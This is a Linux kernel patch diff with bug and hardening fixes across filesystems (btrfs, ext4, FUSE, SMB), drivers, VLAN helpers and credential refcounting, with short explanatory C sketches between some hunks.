+-	 * Some Loongson PCIe ports have h/w limitations of maximum read
+-	 * request size. They can't handle anything larger than this. So
+-	 * force this limit on any devices attached under these ports.
+-	 */
+ 	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
+ 
+ 	bridge->no_inc_mrrs = 1;
+diff --git a/drivers/pci/hotplug/acpiphp_glue.c b/drivers/pci/hotplug/acpiphp_glue.c
+index ea0195337bab9..6efa3d8db9a56 100644
+--- a/drivers/pci/hotplug/acpiphp_glue.c
++++ b/drivers/pci/hotplug/acpiphp_glue.c
+@@ -504,15 +504,12 @@ static void enable_slot(struct acpiphp_slot *slot, bool bridge)
+ 				if (pass && dev->subordinate) {
+ 					check_hotplug_bridge(slot, dev);
+ 					pcibios_resource_survey_bus(dev->subordinate);
+-					if (pci_is_root_bus(bus))
+-						__pci_bus_size_bridges(dev->subordinate, &add_list);
++					__pci_bus_size_bridges(dev->subordinate,
++							       &add_list);
+ 				}
+ 			}
+ 		}
+-		if (pci_is_root_bus(bus))
+-			__pci_bus_assign_resources(bus, &add_list, NULL);
+-		else
+-			pci_assign_unassigned_bridge_resources(bus->self);
++		__pci_bus_assign_resources(bus, &add_list, NULL);
+ 	}
+ 
+ 	acpiphp_sanitize_bus(bus);
+diff --git a/drivers/platform/x86/intel/telemetry/core.c b/drivers/platform/x86/intel/telemetry/core.c
+index fdf55b5d69480..e4be40f73eebf 100644
+--- a/drivers/platform/x86/intel/telemetry/core.c
++++ b/drivers/platform/x86/intel/telemetry/core.c
+@@ -102,7 +102,7 @@ static const struct telemetry_core_ops telm_defpltops = {
+ /**
+  * telemetry_update_events() - Update telemetry Configuration
+  * @pss_evtconfig: PSS related config. No change if num_evts = 0.
+- * @pss_evtconfig: IOSS related config. No change if num_evts = 0.
++ * @ioss_evtconfig: IOSS related config. No change if num_evts = 0.
+  *
+  * This API updates the IOSS & PSS Telemetry configuration. Old config
+  * is overwritten. Call telemetry_reset_events when logging is over
+@@ -176,7 +176,7 @@ EXPORT_SYMBOL_GPL(telemetry_reset_events);
+ /**
+  * telemetry_get_eventconfig() - Returns the pss and ioss events enabled
+  * @pss_evtconfig: Pointer to PSS related configuration.
+- * @pss_evtconfig: Pointer to IOSS related configuration.
++ * @ioss_evtconfig: Pointer to IOSS related configuration.
+  * @pss_len:	   Number of u32 elements allocated for pss_evtconfig array
+  * @ioss_len:	   Number of u32 elements allocated for ioss_evtconfig array
+  *
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index b10ea69a638e1..2624441d2fa92 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -744,14 +744,15 @@ error_1:
+  * sdw_ml_sync_bank_switch: Multilink register bank switch
+  *
+  * @bus: SDW bus instance
++ * @multi_link: whether this is a multi-link stream with hardware-based sync
+  *
+  * Caller function should free the buffers on error
+  */
+-static int sdw_ml_sync_bank_switch(struct sdw_bus *bus)
++static int sdw_ml_sync_bank_switch(struct sdw_bus *bus, bool multi_link)
+ {
+ 	unsigned long time_left;
+ 
+-	if (!bus->multi_link)
++	if (!multi_link)
+ 		return 0;
+ 
+ 	/* Wait for completion of transfer */
+@@ -848,7 +849,7 @@ static int do_bank_switch(struct sdw_stream_runtime *stream)
+ 			bus->bank_switch_timeout = DEFAULT_BANK_SWITCH_TIMEOUT;
+ 
+ 		/* Check if bank switch was successful */
+-		ret = sdw_ml_sync_bank_switch(bus);
++		ret = sdw_ml_sync_bank_switch(bus, multi_link);
+ 		if (ret < 0) {
+ 			dev_err(bus->dev,
+ 				"multi link bank switch failed: %d\n", ret);
+diff --git a/drivers/staging/gdm724x/gdm_lte.c b/drivers/staging/gdm724x/gdm_lte.c
+index 671ee8843c889..5703a9ddb6d0d 100644
+--- a/drivers/staging/gdm724x/gdm_lte.c
++++ b/drivers/staging/gdm724x/gdm_lte.c
+@@ -349,7 +349,7 @@ static s32 gdm_lte_tx_nic_type(struct net_device *dev, struct sk_buff *skb)
+ 	/* Get ethernet protocol */
+ 	eth = (struct ethhdr *)skb->data;
+ 	if (ntohs(eth->h_proto) == ETH_P_8021Q) {
+-		vlan_eth = (struct vlan_ethhdr *)skb->data;
++		vlan_eth = skb_vlan_eth_hdr(skb);
+ 		mac_proto = ntohs(vlan_eth->h_vlan_encapsulated_proto);
+ 		network_data = skb->data + VLAN_ETH_HLEN;
+ 		nic_type |= NIC_TYPE_F_VLAN;
+@@ -435,7 +435,7 @@ static netdev_tx_t gdm_lte_tx(struct sk_buff *skb, struct net_device *dev)
+ 	 * driver based on the NIC mac
+ 	 */
+ 	if (nic_type & NIC_TYPE_F_VLAN) {
+-		struct vlan_ethhdr *vlan_eth = (struct vlan_ethhdr *)skb->data;
++		struct vlan_ethhdr *vlan_eth = skb_vlan_eth_hdr(skb);
+ 
+ 		nic->vlan_id = ntohs(vlan_eth->h_vlan_TCI) & VLAN_VID_MASK;
+ 		data_buf = skb->data + (VLAN_ETH_HLEN - ETH_HLEN);
+diff --git a/fs/afs/rxrpc.c b/fs/afs/rxrpc.c
+index c62939e5ea1f0..37036db63aff3 100644
+--- a/fs/afs/rxrpc.c
++++ b/fs/afs/rxrpc.c
+@@ -424,7 +424,7 @@ error_kill_call:
+ 	if (call->async) {
+ 		if (cancel_work_sync(&call->async_work))
+ 			afs_put_call(call);
+-		afs_put_call(call);
++		afs_set_call_complete(call, ret, 0);
+ 	}
+ 
+ 	ac->error = ret;
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index afcc96a1f4276..539bc9bdcb93f 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -3390,7 +3390,8 @@ static int try_release_extent_state(struct extent_io_tree *tree,
+ 		ret = 0;
+ 	} else {
+ 		u32 clear_bits = ~(EXTENT_LOCKED | EXTENT_NODATASUM |
+-				   EXTENT_DELALLOC_NEW | EXTENT_CTLBITS);
++				   EXTENT_DELALLOC_NEW | EXTENT_CTLBITS |
++				   EXTENT_QGROUP_RESERVED);
+ 
+ 		/*
+ 		 * At this point we can safely clear everything except the
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index dc6e3cce747c1..e8e4781c48a50 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -2182,6 +2182,15 @@ static noinline int __btrfs_ioctl_snap_create(struct file *file,
+ 			 * are limited to own subvolumes only
+ 			 */
+ 			ret = -EPERM;
++		} else if (btrfs_ino(BTRFS_I(src_inode)) != BTRFS_FIRST_FREE_OBJECTID) {
++			/*
++			 * Snapshots must be made with the src_inode referring
++			 * to the subvolume inode, otherwise the permission
++			 * checking above is useless because we may have
++			 * permission on a lower directory but not the subvol
++			 * itself.
++			 */
++			ret = -EINVAL;
+ 		} else {
+ 			ret = btrfs_mksnapshot(&file->f_path, mnt_userns,
+ 					       name, namelen,
+diff --git a/fs/btrfs/ordered-data.c b/fs/btrfs/ordered-data.c
+index bd0c7157e3878..0321753c16b9f 100644
+--- a/fs/btrfs/ordered-data.c
++++ b/fs/btrfs/ordered-data.c
+@@ -544,7 +544,9 @@ void btrfs_remove_ordered_extent(struct btrfs_inode *btrfs_inode,
+ 			release = entry->disk_num_bytes;
+ 		else
+ 			release = entry->num_bytes;
+-		btrfs_delalloc_release_metadata(btrfs_inode, release, false);
++		btrfs_delalloc_release_metadata(btrfs_inode, release,
++						test_bit(BTRFS_ORDERED_IOERR,
++							 &entry->flags));
+ 	}
+ 
+ 	percpu_counter_add_batch(&fs_info->ordered_bytes, -entry->num_bytes,
+diff --git a/fs/ext4/file.c b/fs/ext4/file.c
+index 8ebe4dc7b0170..18f5fd2a163b0 100644
+--- a/fs/ext4/file.c
++++ b/fs/ext4/file.c
+@@ -339,9 +339,10 @@ static void ext4_inode_extension_cleanup(struct inode *inode, ssize_t count)
+ 		return;
+ 	}
+ 	/*
+-	 * If i_disksize got extended due to writeback of delalloc blocks while
+-	 * the DIO was running we could fail to cleanup the orphan list in
+-	 * ext4_handle_inode_extension(). Do it now.
++	 * If i_disksize got extended either due to writeback of delalloc
++	 * blocks or extending truncate while the DIO was running we could fail
++	 * to cleanup the orphan list in ext4_handle_inode_extension(). Do it
++	 * now.
+ 	 */
+ 	if (!list_empty(&EXT4_I(inode)->i_orphan) && inode->i_nlink) {
+ 		handle_t *handle = ext4_journal_start(inode, EXT4_HT_INODE, 2);
+@@ -376,10 +377,11 @@ static int ext4_dio_write_end_io(struct kiocb *iocb, ssize_t size,
+ 	 * blocks. But the code in ext4_iomap_alloc() is careful to use
+ 	 * zeroed/unwritten extents if this is possible; thus we won't leave
+ 	 * uninitialized blocks in a file even if we didn't succeed in writing
+-	 * as much as we intended.
++	 * as much as we intended. Also, we can race with a truncate or a
++	 * write expanding the file, so we have to be a bit careful here.
+ 	 */
+-	WARN_ON_ONCE(i_size_read(inode) < READ_ONCE(EXT4_I(inode)->i_disksize));
+-	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize))
++	if (pos + size <= READ_ONCE(EXT4_I(inode)->i_disksize) &&
++	    pos + size <= i_size_read(inode))
+ 		return size;
+ 	return ext4_handle_inode_extension(inode, pos, size);
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 6ea6b7105fe35..a6e41746890d4 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4110,6 +4110,10 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	start = max(start, rounddown(ac->ac_o_ex.fe_logical,
+ 			(ext4_lblk_t)EXT4_BLOCKS_PER_GROUP(ac->ac_sb)));
+ 
++	/* avoid unnecessary preallocation that may trigger assertions */
++	if (start + size > EXT_MAX_BLOCKS)
++		size = EXT_MAX_BLOCKS - start;
++
+ 	/* don't cover already allocated blocks in selected range */
+ 	if (ar->pleft && start <= ar->lleft) {
+ 		size -= ar->lleft + 1 - start;
+diff --git a/fs/fuse/dax.c b/fs/fuse/dax.c
+index e23e802a80130..6e71904c396f1 100644
+--- a/fs/fuse/dax.c
++++ b/fs/fuse/dax.c
+@@ -1224,6 +1224,7 @@ void fuse_dax_conn_free(struct fuse_conn *fc)
+ 	if (fc->dax) {
+ 		fuse_free_dax_mem_ranges(&fc->dax->free_ranges);
+ 		kfree(fc->dax);
++		fc->dax = NULL;
+ 	}
+ }
+ 
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+index eaa5bd148810a..88942b1fb4318 100644
+--- a/fs/smb/client/smb2misc.c
++++ b/fs/smb/client/smb2misc.c
+@@ -313,6 +313,9 @@ static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+ char *
+ smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+ {
++	const int max_off = 4096;
++	const int max_len = 128 * 1024;
++
+ 	*off = 0;
+ 	*len = 0;
+ 
+@@ -384,29 +387,20 @@ smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+ 	 * Invalid length or offset probably means data area is invalid, but
+ 	 * we have little choice but to ignore the data area in this case.
+ 	 */
+-	if (*off > 4096) {
+-		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
+-		*len = 0;
+-		*off = 0;
+-	} else if (*off < 0) {
+-		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
+-			 *off);
++	if (unlikely(*off < 0 || *off > max_off ||
++		     *len < 0 || *len > max_len)) {
++		cifs_dbg(VFS, "%s: invalid data area (off=%d len=%d)\n",
++			 __func__, *off, *len);
+ 		*off = 0;
+ 		*len = 0;
+-	} else if (*len < 0) {
+-		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
+-			 *len);
+-		*len = 0;
+-	} else if (*len > 128 * 1024) {
+-		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
++	} else if (*off == 0) {
+ 		*len = 0;
+ 	}
+ 
+ 	/* return pointer to beginning of data area, ie offset from SMB start */
+-	if ((*off != 0) && (*len != 0))
++	if (*off > 0 && *len > 0)
+ 		return (char *)shdr + *off;
+-	else
+-		return NULL;
++	return NULL;
+ }
+ 
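
The rewrite above collapses four separate error branches into one range check against fixed bounds, zeroing both offset and length on any violation. A compact sketch of the consolidated validation, using the same 4096/128K limits as the hunk:

#include <stdio.h>

#define MAX_OFF 4096
#define MAX_LEN (128 * 1024)

/* Sanitize an (offset, length) pair describing a data area; on any
 * violation the area is ignored entirely, one code path for all cases. */
static void sanitize_area(int *off, int *len)
{
	if (*off < 0 || *off > MAX_OFF || *len < 0 || *len > MAX_LEN) {
		*off = 0;
		*len = 0;
	} else if (*off == 0) {
		*len = 0;
	}
}

int main(void)
{
	int off = -4, len = 100;

	sanitize_area(&off, &len);
	printf("off=%d len=%d\n", off, len);	/* off=0 len=0 */
	return 0;
}
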
+ /*
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 6ef3c00de5ca1..1b3489a2f0db7 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3122,7 +3122,7 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec close_iov[1];
+ 	struct smb2_ioctl_rsp *ioctl_rsp;
+ 	struct reparse_data_buffer *reparse_buf;
+-	u32 plen;
++	u32 off, count, len;
+ 
+ 	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
+ 
+@@ -3202,16 +3202,22 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	 */
+ 	if (rc == 0) {
+ 		/* See MS-FSCC 2.3.23 */
++		off = le32_to_cpu(ioctl_rsp->OutputOffset);
++		count = le32_to_cpu(ioctl_rsp->OutputCount);
++		if (check_add_overflow(off, count, &len) ||
++		    len > rsp_iov[1].iov_len) {
++			cifs_tcon_dbg(VFS, "%s: invalid ioctl: off=%d count=%d\n",
++				      __func__, off, count);
++			rc = -EIO;
++			goto query_rp_exit;
++		}
+ 
+-		reparse_buf = (struct reparse_data_buffer *)
+-			((char *)ioctl_rsp +
+-			 le32_to_cpu(ioctl_rsp->OutputOffset));
+-		plen = le32_to_cpu(ioctl_rsp->OutputCount);
+-
+-		if (plen + le32_to_cpu(ioctl_rsp->OutputOffset) >
+-		    rsp_iov[1].iov_len) {
+-			cifs_tcon_dbg(FYI, "srv returned invalid ioctl len: %d\n",
+-				 plen);
++		reparse_buf = (void *)((u8 *)ioctl_rsp + off);
++		len = sizeof(*reparse_buf);
++		if (count < len ||
++		    count < le16_to_cpu(reparse_buf->ReparseDataLength) + len) {
++			cifs_tcon_dbg(VFS, "%s: invalid ioctl: off=%d count=%d\n",
++				      __func__, off, count);
+ 			rc = -EIO;
+ 			goto query_rp_exit;
+ 		}
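
check_add_overflow() is the key change above: `off + count` is computed with wrap-around detection before it is compared against the received buffer length, so a huge OutputOffset can no longer pass the check by overflowing. The same idea with the GCC/Clang builtin that backs the kernel macro:

#include <stdint.h>
#include <stdio.h>

/* Validate that [off, off + count) fits inside a buffer of buf_len
 * bytes, rejecting wrap-around on off + count. */
static int area_valid(uint32_t off, uint32_t count, uint32_t buf_len)
{
	uint32_t end;

	if (__builtin_add_overflow(off, count, &end))
		return 0;
	return end <= buf_len;
}

int main(void)
{
	printf("%d\n", area_valid(16, 64, 512));		/* 1 */
	printf("%d\n", area_valid(0xfffffff0u, 32, 512));	/* 0: wraps */
	return 0;
}
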
+@@ -5065,6 +5071,7 @@ receive_encrypted_standard(struct TCP_Server_Info *server,
+ 	struct smb2_hdr *shdr;
+ 	unsigned int pdu_length = server->pdu_size;
+ 	unsigned int buf_size;
++	unsigned int next_cmd;
+ 	struct mid_q_entry *mid_entry;
+ 	int next_is_large;
+ 	char *next_buffer = NULL;
+@@ -5093,14 +5100,15 @@ receive_encrypted_standard(struct TCP_Server_Info *server,
+ 	next_is_large = server->large_buf;
+ one_more:
+ 	shdr = (struct smb2_hdr *)buf;
+-	if (shdr->NextCommand) {
++	next_cmd = le32_to_cpu(shdr->NextCommand);
++	if (next_cmd) {
++		if (WARN_ON_ONCE(next_cmd > pdu_length))
++			return -1;
+ 		if (next_is_large)
+ 			next_buffer = (char *)cifs_buf_get();
+ 		else
+ 			next_buffer = (char *)cifs_small_buf_get();
+-		memcpy(next_buffer,
+-		       buf + le32_to_cpu(shdr->NextCommand),
+-		       pdu_length - le32_to_cpu(shdr->NextCommand));
++		memcpy(next_buffer, buf + next_cmd, pdu_length - next_cmd);
+ 	}
+ 
+ 	mid_entry = smb2_find_mid(server, buf);
+@@ -5124,8 +5132,8 @@ one_more:
+ 	else
+ 		ret = cifs_handle_standard(server, mid_entry);
+ 
+-	if (ret == 0 && shdr->NextCommand) {
+-		pdu_length -= le32_to_cpu(shdr->NextCommand);
++	if (ret == 0 && next_cmd) {
++		pdu_length -= next_cmd;
+ 		server->large_buf = next_is_large;
+ 		if (next_is_large)
+ 			server->bigbuf = buf = next_buffer;
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index 9619015d78f29..c8a4014f9d395 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -1116,7 +1116,7 @@ struct smb2_change_notify_rsp {
+ #define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
+ #define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
+ #define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
+-#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
++#define SMB2_CREATE_ALLOCATION_SIZE		"AlSi"
+ #define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
+ #define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
+ #define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 683152007566c..1598ad6155fef 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -7135,6 +7135,7 @@ skip:
+ 						      smb2_remove_blocked_lock,
+ 						      argv);
+ 				if (rc) {
++					kfree(argv);
+ 					err = -ENOMEM;
+ 					goto out;
+ 				}
+diff --git a/include/asm-generic/qspinlock.h b/include/asm-generic/qspinlock.h
+index 995513fa26904..0655aa5b57b29 100644
+--- a/include/asm-generic/qspinlock.h
++++ b/include/asm-generic/qspinlock.h
+@@ -70,7 +70,7 @@ static __always_inline int queued_spin_is_locked(struct qspinlock *lock)
+  */
+ static __always_inline int queued_spin_value_unlocked(struct qspinlock lock)
+ {
+-	return !atomic_read(&lock.val);
++	return !lock.val.counter;
+ }
+ 
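
queued_spin_value_unlocked() receives the lock word by value, so the copy is private to the caller and a plain `.counter` read suffices; dropping atomic_read() lets the compiler treat the test as ordinary integer arithmetic. A loose C11 analogue of the snapshot-then-test idea; the kernel reads the plain field directly, which C11 atomics do not allow, so this sketch loads once and tests the private copy.

#include <stdatomic.h>
#include <stdio.h>

struct lockword {
	atomic_int val;
};

/* Load the word once; later tests run on the private snapshot, so no
 * further atomic accessors (and no compiler barriers) are needed. */
static int is_unlocked(struct lockword *l)
{
	int snap = atomic_load_explicit(&l->val, memory_order_relaxed);

	return snap == 0;
}

int main(void)
{
	struct lockword l;

	atomic_init(&l.val, 0);
	printf("%d\n", is_unlocked(&l));	/* 1 */
	return 0;
}
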
+ /**
+diff --git a/include/linux/cred.h b/include/linux/cred.h
+index 9ed9232af9340..09c1ed9242b4a 100644
+--- a/include/linux/cred.h
++++ b/include/linux/cred.h
+@@ -108,7 +108,7 @@ static inline int groups_search(const struct group_info *group_info, kgid_t grp)
+  * same context as task->real_cred.
+  */
+ struct cred {
+-	atomic_t	usage;
++	atomic_long_t	usage;
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	atomic_t	subscribers;	/* number of processes subscribed */
+ 	void		*put_addr;
+@@ -228,7 +228,7 @@ static inline bool cap_ambient_invariant_ok(const struct cred *cred)
+  */
+ static inline struct cred *get_new_cred(struct cred *cred)
+ {
+-	atomic_inc(&cred->usage);
++	atomic_long_inc(&cred->usage);
+ 	return cred;
+ }
+ 
+@@ -260,7 +260,7 @@ static inline const struct cred *get_cred_rcu(const struct cred *cred)
+ 	struct cred *nonconst_cred = (struct cred *) cred;
+ 	if (!cred)
+ 		return NULL;
+-	if (!atomic_inc_not_zero(&nonconst_cred->usage))
++	if (!atomic_long_inc_not_zero(&nonconst_cred->usage))
+ 		return NULL;
+ 	validate_creds(cred);
+ 	nonconst_cred->non_rcu = 0;
+@@ -284,7 +284,7 @@ static inline void put_cred(const struct cred *_cred)
+ 
+ 	if (cred) {
+ 		validate_creds(cred);
+-		if (atomic_dec_and_test(&(cred)->usage))
++		if (atomic_long_dec_and_test(&(cred)->usage))
+ 			__put_cred(cred);
+ 	}
+ }
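
The switch from atomic_t to atomic_long_t widens the cred usage counter from 32 to 64 bits on LP64 systems, putting wrap-around out of practical reach. The arithmetic it guards against, shown with well-defined unsigned types:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* ~4 billion get()s wrap a 32-bit counter back to zero, making a
	 * live object look free; 64 bits puts that out of reach. */
	uint32_t narrow = UINT32_MAX;
	uint64_t wide = UINT32_MAX;

	narrow += 1;	/* wraps to 0 */
	wide += 1;	/* 4294967296 */

	printf("u32: %u  u64: %llu\n", narrow, (unsigned long long)wide);
	return 0;
}
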
+diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h
+index 68b1c41332984..e0d0a645be7cf 100644
+--- a/include/linux/if_vlan.h
++++ b/include/linux/if_vlan.h
+@@ -62,6 +62,14 @@ static inline struct vlan_ethhdr *vlan_eth_hdr(const struct sk_buff *skb)
+ 	return (struct vlan_ethhdr *)skb_mac_header(skb);
+ }
+ 
++/* Prefer this version in TX path, instead of
++ * skb_reset_mac_header() + vlan_eth_hdr()
++ */
++static inline struct vlan_ethhdr *skb_vlan_eth_hdr(const struct sk_buff *skb)
++{
++	return (struct vlan_ethhdr *)skb->data;
++}
++
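
skb_vlan_eth_hdr() simply reinterprets skb->data as a VLAN Ethernet header, which is valid in the TX path where the MAC header starts the buffer. A standalone sketch of pulling a VID out of such a frame; the field layout mirrors struct vlan_ethhdr, and the memcpy stands in for the kernel's cast to keep the example alignment-safe.

#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct vlan_frame_hdr {			/* mirrors struct vlan_ethhdr */
	uint8_t h_dest[6];
	uint8_t h_source[6];
	uint16_t h_vlan_proto;		/* 0x8100 for 802.1Q */
	uint16_t h_vlan_TCI;		/* PCP:3 DEI:1 VID:12 */
	uint16_t h_vlan_encapsulated_proto;
} __attribute__((packed));

int main(void)
{
	uint8_t data[18] = { 0 };	/* start of a TX buffer, like skb->data */
	struct vlan_frame_hdr h;

	data[12] = 0x81; data[13] = 0x00;	/* TPID 0x8100 */
	data[14] = 0x20; data[15] = 0x64;	/* PCP 1, VID 100 */

	memcpy(&h, data, sizeof(h));		/* stands in for the cast */
	printf("vid=%u\n", ntohs(h.h_vlan_TCI) & 0x0fff);	/* vid=100 */
	return 0;
}
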
+ #define VLAN_PRIO_MASK		0xe000 /* Priority Code Point */
+ #define VLAN_PRIO_SHIFT		13
+ #define VLAN_CFI_MASK		0x1000 /* Canonical Format Indicator / Drop Eligible Indicator */
+@@ -531,7 +539,7 @@ static inline void __vlan_hwaccel_put_tag(struct sk_buff *skb,
+  */
+ static inline int __vlan_get_tag(const struct sk_buff *skb, u16 *vlan_tci)
+ {
+-	struct vlan_ethhdr *veth = (struct vlan_ethhdr *)skb->data;
++	struct vlan_ethhdr *veth = skb_vlan_eth_hdr(skb);
+ 
+ 	if (!eth_type_vlan(veth->h_vlan_proto))
+ 		return -EINVAL;
+@@ -732,7 +740,7 @@ static inline bool skb_vlan_tagged_multi(struct sk_buff *skb)
+ 		if (unlikely(!pskb_may_pull(skb, VLAN_ETH_HLEN)))
+ 			return false;
+ 
+-		veh = (struct vlan_ethhdr *)skb->data;
++		veh = skb_vlan_eth_hdr(skb);
+ 		protocol = veh->h_vlan_encapsulated_proto;
+ 	}
+ 
+diff --git a/include/linux/mm_inline.h b/include/linux/mm_inline.h
+index 4ef6c09cc2eec..c21e19a1514d1 100644
+--- a/include/linux/mm_inline.h
++++ b/include/linux/mm_inline.h
+@@ -231,22 +231,27 @@ static inline bool lru_gen_add_folio(struct lruvec *lruvec, struct folio *folio,
+ 	if (folio_test_unevictable(folio) || !lrugen->enabled)
+ 		return false;
+ 	/*
+-	 * There are three common cases for this page:
+-	 * 1. If it's hot, e.g., freshly faulted in or previously hot and
+-	 *    migrated, add it to the youngest generation.
+-	 * 2. If it's cold but can't be evicted immediately, i.e., an anon page
+-	 *    not in swapcache or a dirty page pending writeback, add it to the
+-	 *    second oldest generation.
+-	 * 3. Everything else (clean, cold) is added to the oldest generation.
++	 * There are four common cases for this page:
++	 * 1. If it's hot, i.e., freshly faulted in, add it to the youngest
++	 *    generation; it is protected longer than the cases below.
++	 * 2. If it can't be evicted immediately, i.e., a dirty page pending
++	 *    writeback, add it to the second youngest generation.
++	 * 3. If it should be evicted first, e.g., cold and clean from
++	 *    folio_rotate_reclaimable(), add it to the oldest generation.
++	 * 4. Everything else falls between 2 & 3 above and is added to the
++	 *    second oldest generation if it's considered inactive, or the
++	 *    oldest generation otherwise. See lru_gen_is_active().
+ 	 */
+ 	if (folio_test_active(folio))
+ 		seq = lrugen->max_seq;
+ 	else if ((type == LRU_GEN_ANON && !folio_test_swapcache(folio)) ||
+ 		 (folio_test_reclaim(folio) &&
+ 		  (folio_test_dirty(folio) || folio_test_writeback(folio))))
+-		seq = lrugen->min_seq[type] + 1;
+-	else
++		seq = lrugen->max_seq - 1;
++	else if (reclaiming || lrugen->min_seq[type] + MIN_NR_GENS >= lrugen->max_seq)
+ 		seq = lrugen->min_seq[type];
++	else
++		seq = lrugen->min_seq[type] + 1;
+ 
+ 	gen = lru_gen_from_seq(seq);
+ 	flags = (gen + 1UL) << LRU_GEN_PGOFF;
+diff --git a/include/linux/usb/r8152.h b/include/linux/usb/r8152.h
+index 20d88b1defc30..33a4c146dc19c 100644
+--- a/include/linux/usb/r8152.h
++++ b/include/linux/usb/r8152.h
+@@ -29,6 +29,8 @@
+ #define VENDOR_ID_LINKSYS		0x13b1
+ #define VENDOR_ID_NVIDIA		0x0955
+ #define VENDOR_ID_TPLINK		0x2357
++#define VENDOR_ID_DLINK			0x2001
++#define VENDOR_ID_ASUS			0x0b05
+ 
+ #if IS_REACHABLE(CONFIG_USB_RTL8152)
+ extern u8 rtl8152_get_version(struct usb_interface *intf);
+diff --git a/include/net/addrconf.h b/include/net/addrconf.h
+index c04f359655b86..86eb2aba1479c 100644
+--- a/include/net/addrconf.h
++++ b/include/net/addrconf.h
+@@ -31,17 +31,22 @@ struct prefix_info {
+ 	__u8			length;
+ 	__u8			prefix_len;
+ 
++	union __packed {
++		__u8		flags;
++		struct __packed {
+ #if defined(__BIG_ENDIAN_BITFIELD)
+-	__u8			onlink : 1,
++			__u8	onlink : 1,
+ 			 	autoconf : 1,
+ 				reserved : 6;
+ #elif defined(__LITTLE_ENDIAN_BITFIELD)
+-	__u8			reserved : 6,
++			__u8	reserved : 6,
+ 				autoconf : 1,
+ 				onlink : 1;
+ #else
+ #error "Please fix <asm/byteorder.h>"
+ #endif
++		};
++	};
+ 	__be32			valid;
+ 	__be32			prefered;
+ 	__be32			reserved2;
+@@ -49,6 +54,9 @@ struct prefix_info {
+ 	struct in6_addr		prefix;
+ };
+ 
++/* rfc4861 4.6.2: IPv6 PIO is 32 bytes in size */
++static_assert(sizeof(struct prefix_info) == 32);
++
+ #include <linux/ipv6.h>
+ #include <linux/netdevice.h>
+ #include <net/if_inet6.h>
+diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
+index c8490729b4aea..31bf475eca762 100644
+--- a/include/net/if_inet6.h
++++ b/include/net/if_inet6.h
+@@ -22,10 +22,6 @@
+ #define IF_RS_SENT	0x10
+ #define IF_READY	0x80000000
+ 
+-/* prefix flags */
+-#define IF_PREFIX_ONLINK	0x01
+-#define IF_PREFIX_AUTOCONF	0x02
+-
+ enum {
+ 	INET6_IFADDR_STATE_PREDAD,
+ 	INET6_IFADDR_STATE_DAD,
+diff --git a/kernel/cred.c b/kernel/cred.c
+index e10c15f51c1fe..d35bc0aa98cba 100644
+--- a/kernel/cred.c
++++ b/kernel/cred.c
+@@ -99,17 +99,17 @@ static void put_cred_rcu(struct rcu_head *rcu)
+ 
+ #ifdef CONFIG_DEBUG_CREDENTIALS
+ 	if (cred->magic != CRED_MAGIC_DEAD ||
+-	    atomic_read(&cred->usage) != 0 ||
++	    atomic_long_read(&cred->usage) != 0 ||
+ 	    read_cred_subscribers(cred) != 0)
+ 		panic("CRED: put_cred_rcu() sees %p with"
+-		      " mag %x, put %p, usage %d, subscr %d\n",
++		      " mag %x, put %p, usage %ld, subscr %d\n",
+ 		      cred, cred->magic, cred->put_addr,
+-		      atomic_read(&cred->usage),
++		      atomic_long_read(&cred->usage),
+ 		      read_cred_subscribers(cred));
+ #else
+-	if (atomic_read(&cred->usage) != 0)
+-		panic("CRED: put_cred_rcu() sees %p with usage %d\n",
+-		      cred, atomic_read(&cred->usage));
++	if (atomic_long_read(&cred->usage) != 0)
++		panic("CRED: put_cred_rcu() sees %p with usage %ld\n",
++		      cred, atomic_long_read(&cred->usage));
+ #endif
+ 
+ 	security_cred_free(cred);
+@@ -134,11 +134,11 @@ static void put_cred_rcu(struct rcu_head *rcu)
+  */
+ void __put_cred(struct cred *cred)
+ {
+-	kdebug("__put_cred(%p{%d,%d})", cred,
